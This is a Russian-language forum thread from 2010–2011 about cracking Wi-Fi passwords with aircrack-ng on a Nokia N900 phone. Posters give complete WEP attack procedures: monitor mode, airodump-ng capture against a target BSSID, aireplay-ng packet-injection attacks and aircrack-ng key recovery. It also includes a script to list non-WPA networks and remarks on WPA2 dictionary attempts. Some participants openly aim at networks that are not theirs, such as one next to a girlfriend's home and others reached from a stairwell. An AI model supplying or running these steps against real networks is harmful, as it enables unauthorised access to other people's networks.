46 (14.12.2010 19:02:16 отредактировано Nas_tradamus)

Re: aircrack

DiMe

Читайте тут:

http://forum.antichat.ru/threadnav107039-1-10.html

Тут далеко не в один клик все делается.
Ах да... без kernel-power прога работать как надо не будет.

Добавлено: 14.12.2010 18:59:43

Набивать тонну команд в маленьком окошке - то еще удовольствие.
Я делал так: подключался к телефону через USB по ssh, переводил вай-фай в нужный режим и фигачил все с компа. smile

Так как я сам еще не придумал определенный алгоритм и не поломал ни одной сетки (но почти получилось - но устал пакеты ловить)... не написал еще скрипт для взлома в один клик. Хотя, когда-нибудь сделаю это, скорее всего.


Вот мой черновой алгоритм взлома:

1) Переводим вай-фай в режим мониторинга:
airmon-ng start wlan0

2) Смотрим список сетей, выбираем среди них WEP
airodump-ng wlan0

3) Для успешного проведения атаки к точке доступа должна быть подключена
хотя бы одна активная машина, чем больше трафик у которой,
тем быстрее будет подобран ключ.
Включаем режим снифинга и накапливаем статистику.
Чем длиннее WEP-ключ тем больше пакетов необходимо
перехватить (64-битный ключ требует накопления примерно 6000 пакетов):

airodump-ng -i -c 6 --bssid 00:14:D1:3B:5A:4F -w data-capture wlan0

-i захватыавем только IV's (data)
где, "-c 6" - номер канала беспроводной точки доступа
(см. вывод airodump-ng wlan0). В опции --bssid указан идентификатор
точки доступа, для отсеивания лишнего трафика. Все перехваченные
пакеты будут сохранены в файле data-capture-01.cap.

4) Делаем атаку на набор пакетов:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

или

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

5) После накопления достаточного объема статистики подбираем WEP-ключ
(выполняем операцию не прерывая процесс снифинга, так как
числа перехваченных пакетов может не хватить):

aircrack-ng -z data-capture-01.cap
или

aircrack-ng -z -n 128 data-capture-01.cap


====================================

Вывод карты из режима мониторинга в нормальный:

ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up

====================================

Скрипт для поиска уязвимых сетей (не проверял вроде):

iwlist wlan0 scanning | grep -e ESSID -e Encryption -e WPA -e Channel -e Address | grep -v Frequency | sed 's/Address:/net/' | sed 's/Cell [0-9]* -//' | sed 's/^.*Channel://' | sed 's/^.*Encryption key:/enc-/' | sed 's/^.*ESSID://' | sed 's/^.*IE: //' | tr '\n' '|' | sed 's/           /\t/g' | tr '\t' '\n' | grep -v WPA

=====================================

Ломать пытался специально настроенный свой роутер. smile

Nokia N-Gage QD -> Nokia N900

47

Re: aircrack

Короче, есть идея научиться нормально ломать сетки, написать скриптик и может даже гуй к нему.
Чтобы по-быстрому можно было ломать в один клик, не напрягая извилины.

Nokia N-Gage QD -> Nokia N900

Поделиться

48

Re: aircrack

Я правильно понял чтобы заработал airodump-ng нужно чтобы были установлены kernel-power и airodump-ng!? Просто у девушки дома мой телефон находит точку но чтобы подключиться к этой точке нужен пасс. хочу попробовать ломануть!

Поделиться

49

Re: aircrack

DiMe

Пробуйте )

Nokia N-Gage QD -> Nokia N900

Поделиться

50

Re: aircrack

DiMe пишет:

мой телефон находит точку но чтобы подключиться к этой точке нужен пасс. хочу попробовать ломануть

если WPA2 то пробовать можно долго))) очень долго )))

Internet Explorer - это такая программа, с помощью которой можно зайти на сайт www.opera.com и скачать себе браузер...

Сайт Venom4eG

Поделиться

51

Re: aircrack

Да даже WEP, как бы, не быстро, если мощности передатчика не хватает, чтобы зафлудить фэйк-пакетами соседа.

А WPA2 даже не пытайтесь лучше )

Nokia N-Gage QD -> Nokia N900

Поделиться

52 (14.12.2010 19:55:05 отредактировано IDis)

Re: aircrack

DiMe
да ты не обольщайся. это работает только с WEP.
для WPA2 нужны танцы с бубнами.

Поделиться

53

Re: aircrack

WPA разве можно взломать?
Ну, не считая брутфорса, конечно.

A mammal should be able to hunt mice, hibernate, fly, chew its cud, echolocate, invent tools, lay eggs, burrow. Speciation is for insects.

Поделиться

54

Re: aircrack

по словарю. Это скорее, не взлом, а удача...

Поделиться

55

Re: aircrack

IDis пишет:

WPA2 нужны танцы с бубнами.

какие танцы? хоть греческие хоть ирландские... его пока в принципе никто сломать не смог)) если только админу иголки под ногти пихать и пальцы пассатижами сжимать... )))

Internet Explorer - это такая программа, с помощью которой можно зайти на сайт www.opera.com и скачать себе браузер...

Сайт Venom4eG

Поделиться

56

Re: aircrack

Venom4eG пишет:
IDis пишет:

WPA2 нужны танцы с бубнами.

какие танцы? хоть греческие хоть ирландские... его пока в принципе никто сломать не смог)) если только админу иголки под ногти пихать и пальцы пассатижами сжимать... )))

Я сразу скажу не спец... Прогу установил ради интереса... WEP домашний при 128 битной кодировке сломал за 20 минут (оговорюсь сразу специально давал нагрузку на роутер путем скачивания торрентов, пакеты просто летели при перехвате больше 500 000 тысяч пакетов)...  Сама процедура взлома уже по перехваченным пакетам была меньше 2 минут... При первом способе взлома Rootfs этими самыми пакетами сожрало около 20 мб.

Второй способ пробовал на коммерческой точке Wi-Fi c WPA2 Ну как то не пошло...
Прошестил инет и скачал кучу словарей по подбору паролей... Решил обмануть судьбу и сделать один большой... Писец полный (в смысле толстый полярный лисичк...) он получился такой громадный... Что при включении подбора по словарю на отловленных пакетах прога виснет конкретно... Греется писец как... Без дизель-генератора или сети под рукой не реально... Результата не дождался... Где то в инете читал, что какой то умник в эту прогу (ПК вариант) примонтировал генератор последовательных кодов начиная от цифр и заканчивая до 128 битных вариантов... И еще где то была информашка что грузит программу не сам подбор а перебирание этого 250 мб-ного файла паролей... Ну это у меня он такой получился... Кто что знает по этому поводу... Поделитесь информацией...

Поделиться

57 (24.07.2011 20:27:29 отредактировано Dominic)

Re: aircrack

Почитал тут алгоритм взлома и... а у меня все проще было... Или это мне так кажется...
Короче брал с соседнего форума алгоритм следующий был:

kernel-power у меня стоял уже...
airkrack-ng ставил из диспетчера файлов

Затем:

root
#airmon-ng start wlan0

- должна была быть эта команда по сценарию, но она не пошла, не хватало какого то пакета iw - установить не удалось из за каких то конфликтов...

Поэтому пошли путем ввода этих команд:

#ifconfig wlan0 down
#iwconfig wlan0 mode Monitor
#ifconfig wlan0 up

- три последоватеьно введенных команды перевели модуль в режим мониторинга сети

#airodump-ng wlan0

- показывает нам монитор сетей в реальном времени с доступными точками, мак адресами, каналами и обменом пакетов... Команда нужна в принципе для того чтобы определить цель и в последствии с нее списать макадрес...

#airodump-ng --channel 1 --bssid 00:14:9A:09:02:1E -w work --ivs wlan0

- команда для отлова пакетов с записью в /root файлики будут с названиями work01.ivs work02.ivs и т.д. (МАКАДРЕС 00:14:9A:09:02:1E пишу для своего роутера, у вас будет какой то другой)
При использовании этой команды отловленные пакеты забивают RootFS... sad чтобы этого не происходило и нам не приходилось потом вручную его чистить, предлагаю в папке /home/user/MyDocs/ создать папку к примеру tmp

После этого, можно использовать ту же команду но с небольшим изменением:

#airodump-ng --channel 1 --bssid 00:14:9A:09:02:1E -w /home/user/MyDocs/tmp/work --ivs wlan0

- в таком варианте весь хлам в виде отловленных пакетов будет скапливаться в /home/user/MyDocs/tmp/ и не будет захломлять нам RootFS... И Легко чистить



После начинается перехват пакетов, нам для WEP нужно вроде как от 20 000 пакетов для успешного взлома... У меня не прошло, начинает ломать как правило после 75 000 пакетов (столбик #Data)

После перехвата нужного нам количества пакетов жмем Ctr+C - останавливаем перехват

#aircrack-ng /home/user/MyDocs/tmp/work*.ivs

- непосредственно сам взлом пароля

В конце получаем что то вроде такого:

KEY FOUND![AD:AF:1E:2B:24:6B:6B:44:36:0B:3D]

Это шестнадцетеричный код, прописываем его при подключении БЕЗ ДВОЕТОЧИЯ (типа такого что тоADAF1E2B246B6B44360B3D) и мы подлючены...
Иногда заветная надпись не выскакивает, одной из причин является недостаточное количество пакетов... Тогда их перехват можно продолжить, причем не заново, а доперехвачивать так сказать той же командой... И пробуем снова взломать...
После успешного или не очень успешного взлома, возвращаем рабочее состояние модулю Wi-Fi командами:

#ifconfig wlan0 down
#iwconfig wlan0 mode Managed
#ifconfig wlan0 up

58

Re: aircrack

Dominic

Еще пару моментов:

1) Для успешного взлома надо наловить примерно 5 тысяч пакетов. А лучше тысяч 50 наловить для гарантированного быстрого взлома.
2) С жертвой может быть не очень стабильный коннект и пакеты будут ловиться редко. либо тому причиной может служить слабая активность атакуемого.
Можно заставить точку генерировать пакеты, проведя атаку:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

или (если не сработает первый вариант)

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

Но если у вас слабый передатчик (а в n900 все именно так), то атака может быть безуспешной.

Nokia N-Gage QD -> Nokia N900

Поделиться

59

Re: aircrack

Nas_tradamus пишет:

Dominic

Еще пару моментов:

1) Для успешного взлома надо наловить примерно 5 тысяч пакетов. А лучше тысяч 50 наловить для гарантированного быстрого взлома.

50000 не прокатило, я же писал... Попробовал 5000 написало-нужно минимум 15 000, наловил 15 000, написало - попробуйте 35 000, на 35 000 не прошло и я скачал 75 000 и взломалось... Но это ужебыло после первого взлома... Для первого взлома под 500 000 тысяч качал IVсов

Добавлено: 07.01.2011 02:55:19

Nas_tradamus пишет:

Можно заставить точку генерировать пакеты, проведя атаку:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

или (если не сработает первый вариант)

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]


А построчно и по буквам можно подсказать где что и какую функцию выполняет в каждой строке???

Поделиться

60

Re: aircrack

А на счет слабого сигнала от N900 думаю не настолько он и слаб, чтобы атаковать и собирать пакеты... Думаю не много найдется желающих хакнуть вафлю на слабом сигнале. если есть желание, хакни код на сильном сигнале, подойдя поближе (даже с подъезда) в том то и прелесть взлома с телефона... а уже после отлавливания пакетов иди куда хочешь и ломай пароль а потом уж пробуй подключиться...

вопрос попутно: команды аттаки вводятся при активном отлавливании пакетов? Это как должно выглядеть? у меня при получении пакетов ничего не вводится в терминале... Или я просто туплю???

Поделиться